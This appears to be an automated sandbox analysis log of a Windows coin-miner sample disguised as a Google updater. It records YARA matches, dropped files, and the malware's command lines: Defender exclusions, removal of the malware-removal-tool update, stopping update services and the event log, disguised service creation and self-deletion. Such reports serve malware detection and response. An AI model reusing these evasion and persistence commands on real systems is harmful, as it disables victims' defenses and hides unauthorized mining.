Source: C:\Users\user\Desktop\updater.exe, Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\svchost.exe, Process Stats: CPU usage > 6%
Source: C:\Users\user\Desktop\updater.exe, Code function: 0_2_00007FF6568E1394 NtRollbackTransaction
Source: C:\ProgramData\Google\Chrome\updater.exe, Code function: 36_2_00007FF758EE1394 NtCreateProcessEx
Source: C:\Windows\System32\conhost.exe, Code function: 60_2_0000000140001394 NtThawTransactions
Source: C:\ProgramData\Google\Chrome\updater.exe, File created: C:\Windows\TEMP\zlvyxohjpfnw.sys
Source: C:\Users\user\Desktop\updater.exe, File deleted: C:\Windows\System32\MRT.exe
Source: C:\Users\user\Desktop\updater.exe, Code function: 0_2_00007FF6568E6779
Source: C:\ProgramData\Google\Chrome\updater.exe, Code function: 36_2_00007FF758EE6779
Source: C:\Windows\System32\conhost.exe, Code function: 60_2_0000000140003160
Source: C:\Windows\System32\conhost.exe, Code function: 60_2_00000001400026E0
Source: Joe Sandbox View, Dropped File: C:\Windows\Temp\zlvyxohjpfnw.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
Source: C:\Users\user\Desktop\updater.exe, Code function: String function: 00007FF6568E1394 appears 33 times
Source: C:\ProgramData\Google\Chrome\updater.exe, Code function: String function: 00007FF758EE1394 appears 33 times
Source: updater.exe, 00000024.00000003.345289244338.0000022A746B0000.00000004.00000001.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameWinRing0.sys2 vs updater.exe
Source: 62.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 62.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 62.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: svchost.exe PID: 6248, type: MEMORYSTR, Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: zlvyxohjpfnw.sys.36.drBinary string: \Device\WinRing0_1_2_0
          Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@93/12@2/2
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4668:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3628:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3020:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4344:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:608:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:448:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5956:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2624:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:284:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:284:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1632:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4668:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3372:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3408:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7224:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4356:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6792:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5956:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4344:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3336:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7380:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5816:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3224:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3376:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3376:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3628:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1244:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1632:120:WilError_03
          Source: C:\Windows\System32\svchost.exeMutant created: \BaseNamedObjects\Global\hlhwzjwrxrewbblx
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7496:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2264:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7224:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3224:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3336:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6792:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2264:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6236:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3408:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2624:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:448:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3372:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3020:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:608:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4356:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7496:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6236:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1244:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5816:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7380:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_off4oeim.vh2.ps1
          Source: updater.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Users\user\Desktop\updater.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: updater.exeReversingLabs: Detection: 95%
          Source: updater.exeVirustotal: Detection: 82%
          Source: C:\Users\user\Desktop\updater.exeFile read: C:\Users\user\Desktop\updater.exe
          Source: unknownProcess created: C:\Users\user\Desktop\updater.exe "C:\Users\user\Desktop\updater.exe"
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\updater.exe"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\ProgramData\Google\Chrome\updater.exe C:\ProgramData\Google\Chrome\updater.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\svchost.exe svchost.exe
          Source: C:\Users\user\Desktop\updater.exeSection loaded: apphelp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wusa.exe | Section loaded: dpx.dll
          Source: C:\Windows\System32\wusa.exe | Section loaded: wtsapi32.dll
          Source: C:\Windows\System32\wusa.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\wusa.exe | Section loaded: edgegdi.dll
          Source: C:\Windows\System32\wusa.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wusa.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
          Source: C:\ProgramData\Google\Chrome\updater.exe | Section loaded: apphelp.dll
          Source: C:\Windows\System32\choice.exe | Section loaded: version.dll
          Source: C:\Windows\System32\choice.exe | Section loaded: edgegdi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: xmllite.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
